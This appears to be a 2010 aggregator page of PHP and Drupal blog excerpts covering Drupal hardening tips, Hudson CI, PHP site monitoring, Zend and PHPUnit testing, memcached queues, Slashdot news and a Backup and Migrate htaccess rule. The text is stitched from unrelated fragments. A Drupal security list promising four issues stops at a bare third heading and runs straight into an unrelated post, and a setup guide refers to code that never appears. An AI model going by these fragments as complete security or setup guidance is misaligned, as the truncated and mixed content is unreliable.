Mon, Feb 8, 2010 by Arnold

While Drupal is a secure system, there are 4 configuration issues that are often overlooked when developing a Drupal site. By following a few easy steps, we can make a Drupal site much less vulnerable.

1) Leaving Drupal Version Information Text Files on Server
A lot of developers forget to delete the Change Log and other text files that come with the Drupal package. By leaving the text files on the server and having them accessible, you enable potential hackers to know about the exact version of Drupal that you are using. Once the hackers know about the version, they can more easily find the exploits to hack into the Drupal site.

2) Cross Site Scripting
Cross site scripting can happen if you allow visitors to post any HTML code and JavaScript into form boxes. This will allow hackers to post malicious code onto your web page. It is critical to either ensure that only filtered HTML is allowed for postings or to run the check_plain() function against all user input.

3) Exposing Apache/Server Tokens

Benjamin Eberlei has a new post to his blog today pointing you to some PHP & Hudson CI integration resources that can help you get this powerful combination up and running for your deployment process.

Although phpUnderControl is the most wide-spread, but from I heard complex to setup/maintain, solution supposedly a hack and Arbit just in an early Alpha I decided to give Hudson a shoot. Another reason for this decision, I heard it has a simple plugin architecture and is easy to install and use.

He moved away from his own bash script-based CI setup towards something a bit more technical, something that would give him a bit more control over running unit tests, create code coverage, etc. He lists three sites that helped him get his Hudson install up and running and another is mentioned in the comments.

In a new post to the CatsWhoCode.com blog Jean-Babtiste Jung walks you through the creation of a simple monitoring script written using just PHP that can tell you if your web site is up and responsive.

In order to make sure that your website is always available to the public, you have to monitor it. In this tutorial, I'll show you how you can easily create a monitoring script that will check your website availability and send an email or sms alert to you if it isn't.

They have a snippet of code (about 15 lines long) with a function you can call to check a remote host's connection and check the returned data for a certain string. This can not only ensure that your site is responsive but also that it's not responding incorrectly. You could even use this to hit a certain monitoring page of your site to check for certain things (like database connection problems).

On the Xebee blog there's a recent post looking at test-driven development with the Zend Framework and PHPUnit. They show how they work well together and make it simpler to use TTD to create and test your applications.

Over the past few days I was going through the Zend Framework reference docs and I found myself pleasantly surprised with all that the latest version of this web application framework provides. [...] Out of the many new features, what stood out for me was the ease with which Zend Framework and PHPUnit complement and work with each other.

He talks about some of the features of PHPUnit (including dependencies, testing for exceptions and errors) and how it fits into a good deployment strategy. He shows how you can use the Zend_Test component of the framework, along with the Zend_Test_PHPUnit features, to make a sample test case. There's also an example of using the Zend_Test_PHPUnit_Db component to test database information and your backend data stores to compare them to a formatted XML document.

New on the Blue Parabola blog today, there's an article from Keith Casey trying to set the record straight on some recent benchmarks put together by Zend and Acquia showing the performance of Drupal.

While I have not attempted to duplicate or validate any of their individual numbers or conclusion as a whole, I have been a Drupal user for well over five years and have launched 30+ sites on it.

With this experience to back him up, he points out a few things about the report that either needed work or were misleading in their results. This includes a limitation on the web server configurations they covered, the statistics on Windows performance (might turn people off to using it on this platform) and the emphasis being put in some of the wrong places - optimizing PHP versus Drupal.

He recommends that, like all studies and whitepapers like this, you take the results as only guidelines and examples, not as absolute facts. There's always going to be differences in hardware, software and configuration so what gave the big numbers and results for them might not work for you.

Yea I just submitted my Drupalcon San Franciso 2010 session now I have to wait to see if it's worthy of a talk fingers crossed

Here are the details and the Drupal Con session submission link just in case you where wanting to vote for it on Feb 16th, 2010:

-->

As Developer.com mentions in a new article, there's a new video tutorial posted over on Internet.com about using PHP and JSON to pass around data in your applications.

Got seven minutes to learn how you can harness the power of PHP, JavaScript and JSON in a powerful AJAX-driven web application? This Internet.com Video tutorial shows you all you need to know to pass data between the client and server using JSON data format.

The video explains a bit about JSON+PHP and shows you how to send a simple message (book-related data) to the server and how to handle the response with a little help from jQuery's Ajax functions.

Filmmaker John Waters began his career as an "underground success", making films that mainstream wouldn't touch because they were too controversial, raunchy, or just plain weird. After several underground successes, however, he started to get noticed outside of underground and indie circles and move into the mainstream, where he had even more commercial success.

Many of his fans derided him for the move, claiming he was "caving into the man" or betraying his underground roots by adapting his style for wider audiences. In an interview for his 1998 film Pecker, Waters made the comment (sadly I do not have the direct quote handy) that the problem with being an underground success is that you then, by definition, cannot stay underground. And yes, that means you sometimes have to change things.

Why do I bring this up? Because Drupal has long since ceased being an underground success and is now a major mainstream open source player... and it's time that the community acted like it.

Abhinav Singh has a new post to his blog that looks at using a powerful tool, memcached, with PHP to create a simple queue system that could be reused just about anywhere.

Memcached is a scalable caching solution developed by Danga interactive. One can do a lot of cool things using memcached including spam control, online-offline detection of users, building scalable web services. In this post, I will demonstrate and explain how to implement fast scalable queues in PHP.

He starts with an overview of what the queue will let you do - save data into the queue with a unique identifier and pull it back out based on the key requested (and is removed from the queue). The code sets up the connection to the memcached server and gives you methods to check if the queue is empty and to push and pull records in and out. A bit of sample code illustrates how to put it to use.

Anyone who has been doing Search Engine Optimization (SEO) for a very long knows that what you title your web pages is very important. To get a little technical, since there can be some confusion, when I refer to Page Titles I mean what is between the <title> and </title> tags in the heading portion of a web page. This is the title that shows at the top of your web browser when visiting a page.

read more

In another of his "Solar Shorts" Richard Thomas talks about the road to Solar 1.0 as broken down into three points that will lead up to the framework's 1.0 release.

If you haven't taken a look at the Solar Framework in the past now is the time to do so as the three biggest complaints about Solar are on the road to be resolved.

Some of the things that might have made you skip over the framework in the past are being worked on right now:

• Solar has been in perpetual alpha/beta forever..
• Documentation, all the cool Frameworks have cool docs.
• Examples, sometimes the easiest way to learn is to study a working application

For more information about the Solar framework, head over to SolarPHP.com and grab the latest copy.

I read on the Development Seed blog about a New Release: Aegir 0.4 Alpha 5, and since aWebFactory finds itself in the midst of retooling (Git! Aegir! ... more soon), I knew this was a great moment for biting the bullet and stop reading about Aegir and actually installing and enjoying all that hard work the devs had been doing.

The post includes a link to mig5's incredible video (see below for References and links), which also basically follows the step-by-step instructions found in the officially supported INSTALL.txt and the first part of this article basically consists of the steps I took following along. It took me about two hours to install Aegir and make my first use of it (deploying some new staging sites), as well as writing this post.

read more

Latest PEAR Releases:

• PEAR_PackageFileManager_Plugins 1.0.1
• PEAR_PackageFileManager2 1.0.1
• VersionControl_Git 0.4.2
• Auth_SASL 1.0.4

Below you'll find my slides for the presentation at fosdem 2010

Setting up a new machine to be able to do drupal development often takes a lot of time, googling and tweaking. To ease that process i've created a automated installation process which takes you up to speed in roughly 20 minutes.
The whole installation process is split up in three different steps.

• Setup Lamp Server
• Setup Drush
• Setup Eclipse

These steps have been automated based on a freshly installed Ubuntu 9.04.
Just run the following code and follow the trivial installation steps.

I remember how skeptical I was looking at some presenters traveling around to multiple conferences with "the same" presentation a decade or so ago. Having been a course instructor for years and being a presenter for even longer, it looks completely different now. It's not that the topics you cover under the same looking umbrella can be quite different, you also find much better ways to express whatever you want to tell your audience as you experience feedback.

Of course the best would be to present your story crystal clear from the start, but despite being an enthusiastic follower of Garr Reynolds and Nancy Duarte, you'll undoubtedly need lots of time anyway to take a relaxed look on your story and distill to the level needed to form a great presentation. I've actually found it quite hard to refine my slides without actually showing/presenting them to an audience. The faces, questions, smiles and sometimes plain staring expressions you get tell you how you'd done and you can derive ways of how can you improve.

Two interesting examples are my slides on Drupal 7 and localize.drupal.org.

read more

In Drupal 7, one of the major advantages is Fields in Core, the concept that any and every entity can have fields added to them in a standardised manner. All of the CRUD is dealt with by core rather than replying on contributed modules. It is an evolution of the CCK module for Drupal 6 and before.

We have been using Fields in Core in the update of the Storm module to Drupal 7, and it is quite easy to get going with.

read more

theodp writes "CNET's hunch that Google might run a Super Bowl ad entitled 'Parisian Love' proved to be well-founded. The ad just ran (did you know that you can search the Internet using Google?), and Apple certainly doesn't have to worry about losing its claim to having produced the best Super Bowl ad ever. In fact, you might want to check out the spoof 'Parisian Love' apparently inspired — 'Is Tiger Feeling Lucky?' — if you want to see a better pitch for Google."

Read more of this story at Slashdot.

alphadogg writes "A Chinese man was sentenced to two-and-a-half years in a US prison this week for trafficking in counterfeit Cisco Systems gear. Yongcai Li, 33, will also have to pay the networking company nearly $800,000 in restitution after being the conduit for hundreds of thousands of dollars' worth of counterfeit computer hardware, the FBI said Friday. Prosecutors said he procured the fake gear in China and then sent it to co-conspirators in the US. His alleged co-conspirators have not been charged. Li was arrested by FBI agents on Jan. 9, 2009, in Las Vegas — while the annual Consumer Electronics Show was taking place there. Two years ago, the FBI claimed to have seized more than $78 million worth of counterfeit equipment in more than 400 seizures"

Read more of this story at Slashdot.

Curlsman informs us that the first beta of Ruby on Rails 3.0 has been released ( release notes here). Rails founder David Heinemeier Hansson blogged that RoR 3.0 "feels lighter, more agile, and easier to understand." This release is the first the Merb team has participated in. Merb is a model-view-controller framework written in Ruby, and they joined the RoR development effort over a year ago. Reader Curlsman asks, "So, is version 3 of RoR going to be a big deal, more of the same (good or bad), or just churning technology?"

Read more of this story at Slashdot.

Over the past two days I spent quite a few hours trying to figure out why the update for Backup and Migrate 2.2 would not save to the scheduled folder.

Since I had two sites and it was only occurring on one of them I knew it was not the module itself but more likely a permissions issue. This is where I spent most of my time, verifying the various folders permissions, ownership etc...

The Drupal module Backup and Migrate places an htaccess file in each of the folders, manual and scheduled, with:

order deny,allow
deny from all